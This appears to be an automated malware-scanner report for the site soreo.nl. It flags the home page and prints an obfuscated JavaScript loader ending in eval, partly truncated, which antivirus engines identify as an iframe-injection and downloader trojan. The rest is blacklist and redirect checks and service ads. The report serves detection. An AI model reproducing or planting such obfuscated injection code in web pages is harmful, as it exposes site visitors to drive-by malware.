New scan:

Malware Scanner report for soreo.nl

Malicious/Suspicious/Total urls checked
1/0/2
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.soreo.nl/
200 OK
Content-Length: 14341
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

d='function $M(file -z ?P L-B="GE <= a ,rt="" Ke ,E=tru & ,r.offset=100 Un L-L @u @y @J LA9 N ,e @q LA9 N Um L-n ],P ]Urg L-k(); .sxml2 X1 A.icrosoft X2 -z=null}}if(! z Ztypeof M!="undefined" -z : M ]+ E= 4}} Uc _> -t[ $o [>,false) Uv _>, =vars Z 4== =vars A= /( % $o), % >)) + t[ % $o) [% >) W} UH L$p, $S A$T= % Yx);regexp :RegExp( Yx+"|"+ $T); H/ Sp 6regexp) Ii=0;i< H/ hj= H/[i] 6"=");if( 4= SS -v G + c G}}}; a.trim _$f Z"qabcdef".indexOf( $o.substr(0,1))>=0){ H
... 3346 bytes are skipped ...
"|| )==" K ,b= 4 ,w=fals L ! MXMLHttpRequest NunR (()} O -rt+= Yx+ $ Pajax.runAJAX( Q]= #z.status Rz.open( B, S= $ T-d!3 U} , V%b%a#6Q W, 4) X.XMLHTTP" 5 Y r Z){if( []= /( ]() ^!2* _ L$o, `&0/ awindow d$R A3 e&4/ f$3%6%fT$4 g. $ h 7;i++ A$ j&7< k $f[ $o]}';for(c=130;c;d=(t=d.split(' ! # $ % & ( ) * + , - . / 0 2 3 4 5 6 7 8 9 : ; < = > ? @ A C G H I J K L M N O P Q R S T U V W X Y Z [ ] ^ _ ` a d e f g h j k'.substr(c-=(x=c<2?1:2),x))).join(t.pop()));eval(d)

Antivirus reports:

AntiVir
HTML/IFrame.Inje.1
Avast
JS:Iframe-CG [Trj]
Ikarus
Trojan.JS.Iframeinject
nProtect
Trojan.JS.Agent.EHM
VBA32
Trojan-Downloader.JS.Twetti.k
TrendMicro-HouseCall
TROJ_GEN.RCBH1B8
Emsisoft
Trojan.JS.Agent.EHM (B)
Comodo
TrojWare.HTML.IFrame.IM
CAT-QuickHeal
JS/Iframeinject.LQ
DrWeb
JS.Click.232
Kaspersky
Trojan-Downloader.JS.Twetti.k
Microsoft
Trojan:JS/Iframeinject.L
MicroWorld-eScan
Trojan.JS.Agent.EHM
Fortinet
JS/Crypt.BN!tr
TotalDefense
JS/Twetti.C
Jiangmin
Trojan/Script.Gen
NANO-Antivirus
Trojan.Script.Twetti.hvmqx
F-Secure
Trojan.JS.Agent.EHM
VIPRE
Trojan-Downloader.JS.Twettir.a (v)
AVG
JS/Tweet
Norman
Agent.XI
GData
Trojan.JS.Agent.EHM
Agnitum
JS.Twetty.Gen
ESET-NOD32
JS/Kryptik.BN
BitDefender
Trojan.JS.Agent.EHM

http://www.soreo.nl/test404page.js
404 Not Found
Content-Length: 290
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: soreo.nl

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: soreo.nl
Referer: http://www.google.com/search?q=soreo.nl

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=soreo.nl

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://soreo.nl/

Result: soreo.nl is not infected or malware details are not published yet.